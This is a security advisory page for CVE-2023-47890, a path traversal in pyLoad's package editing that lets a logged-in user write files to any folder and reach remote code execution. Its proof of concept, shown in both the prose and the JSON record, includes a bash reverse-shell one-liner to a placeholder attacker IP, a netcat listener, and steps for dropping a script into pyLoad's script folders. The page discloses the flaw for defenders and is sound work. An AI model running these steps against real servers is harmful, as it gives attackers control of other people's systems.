ghsa-h73m-pcfw-25h2
Vulnerability from github
Published
2023-11-21 22:19
Modified
2024-01-08 22:14
Severity ?
7.6 (High) - CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H
Summary
Download to arbitrary folder can lead to RCE
Details

Summary

A web UI user can store files anywhere on the pyLoad server and gain command execution by abusing scripts.

Details

When a user creates a new package, a subdirectory is created within the /downloads folder to store files. This new directory name is derived from the package name, except a filter is applied to make sure it can't traverse directories and stays within /downloads.

src/pyload/core/api/init.py::add_package::L432

python folder = ( folder.replace("http://", "") .replace("https://", "") .replace(":", "") .replace("/", "_") .replace("\\", "_") )

So if a package were created with the name "../" the application would instead create the folder "/downloads/.._/"

However, when editing packages there is no prevention in place and a user can just pick any arbitrary directory in the filesystem.

src/pyload/webui/app/blueprints/json_blueprint.py::edit_package::L195

```python id = int(flask.request.form["pack_id"]) data = { "name": flask.request.form["pack_name"], "_folder": flask.request.form["pack_folder"], "password": flask.request.form["pack_pws"], }

api.set_package_data(id, data) ```

Steps to reproduce

  1. Login to a pyLoad instance
  2. Go to "Queue" and create a new package with any name and a valid link
  3. Click "Edit Package" on the newly created package and set the folder as "/config/scripts/download_finished/"
  4. Restart the package
  5. Check the server filesystem and note the link was downloaded and stored inside "/config/scripts/download_finished/"

Remote code execution proof-of-concept

It is possible to use this issue to abuse scripts and gain remote control over the pyLoad server.

On attacker machine

  1. Start a web server hosting a malicious script

bash echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<attacker_ip>/9999 0>&1' > evil.sh&1 sudo python3 -m http.server 80

  1. Start netcat listener for reverse shells

bash nc -vklp 9999

On pyLoad

  1. Change pyLoad file permission settings

    Change permissions of downloads: On Permission mode for downloaded files: 0744

  2. Create a package with link pointing to the attacker

    http:///evil.sh

  3. Edit package and change folder to /config/scripts/package_deleted/

  4. Refresh package. Wait up to 60 seconds for scripts to be processed by pyLoad

  5. Delete any package package to trigger the script

Impact

An authenticated user can gain control over the underlying pyLoad server.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "pyload-ng"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.0b3.dev75"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-47890"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-21T22:19:10Z",
    "nvd_published_at": "2024-01-08T20:15:44Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nA web UI user can store files anywhere on the pyLoad server and gain command execution by abusing scripts.\n\n### Details\n\nWhen a user creates a new package, a subdirectory is created within the /downloads folder to store files. This new directory name is derived from the package name, except a filter is applied to make sure it can\u0027t traverse directories and stays within /downloads.\n\nsrc/pyload/core/api/__init__.py::add_package::L432\n\n```python\n  folder = (\n      folder.replace(\"http://\", \"\")\n      .replace(\"https://\", \"\")\n      .replace(\":\", \"\")\n      .replace(\"/\", \"_\")\n      .replace(\"\\\\\", \"_\")\n  )\n```\n\nSo if a package were created with the name ```\"../\"``` the application would instead create the folder ```\"/downloads/.._/\"```\n\nHowever, when editing packages there is no prevention in place and a user can just pick any arbitrary directory in the filesystem.\n\nsrc/pyload/webui/app/blueprints/json_blueprint.py::edit_package::L195\n\n```python\n  id = int(flask.request.form[\"pack_id\"])\n  data = {\n      \"name\": flask.request.form[\"pack_name\"],\n      \"_folder\": flask.request.form[\"pack_folder\"],\n      \"password\": flask.request.form[\"pack_pws\"],\n  }\n\n  api.set_package_data(id, data)\n```\n\n### Steps to reproduce\n\n1. Login to a pyLoad instance\n2. Go to \"Queue\" and create a new package with any name and a valid link\n3. Click \"Edit Package\" on the newly created package and set the folder as \"/config/scripts/download_finished/\"\n4. Restart the package \n5. Check the server filesystem and note the link was downloaded and stored inside \"/config/scripts/download_finished/\"\n\n### Remote code execution proof-of-concept\n\nIt is possible to use this issue to abuse scripts and gain remote control over the pyLoad server.\n\n#### On attacker machine\n\n1. Start a web server hosting a malicious script\n\n```bash\necho -e \u0027#!/bin/bash\\nbash -i \u003e\u0026 /dev/tcp/\u003cattacker_ip\u003e/9999 0\u003e\u00261\u0027 \u003e evil.sh\u00261\nsudo python3 -m http.server 80\n```\n\n\n2. Start netcat listener for reverse shells\n\n  ```bash\n  nc -vklp 9999\n  ```\n\n#### On pyLoad\n\n1. Change pyLoad file permission settings\n\n    Change permissions of downloads: On\n    Permission mode for downloaded files: 0744\n\n2. Create a package with link pointing to the attacker\n\n    http://\u003cattacker_ip\u003e/evil.sh\n\n3. Edit package and change folder to /config/scripts/package_deleted/\n\n4. Refresh package. Wait up to 60 seconds for scripts to be processed by pyLoad\n\n5. Delete any package package to trigger the script\n\n### Impact\n\nAn authenticated user can gain control over the underlying pyLoad server.",
  "id": "GHSA-h73m-pcfw-25h2",
  "modified": "2024-01-08T22:14:13Z",
  "published": "2023-11-21T22:19:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/security/advisories/GHSA-h73m-pcfw-25h2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47890"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/commit/695bb70cd88608dc4fee18a6a7ecb66722ebfd8f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pyload/pyload"
    },
    {
      "type": "WEB",
      "url": "http://pyload.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Download to arbitrary folder can lead to RCE"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.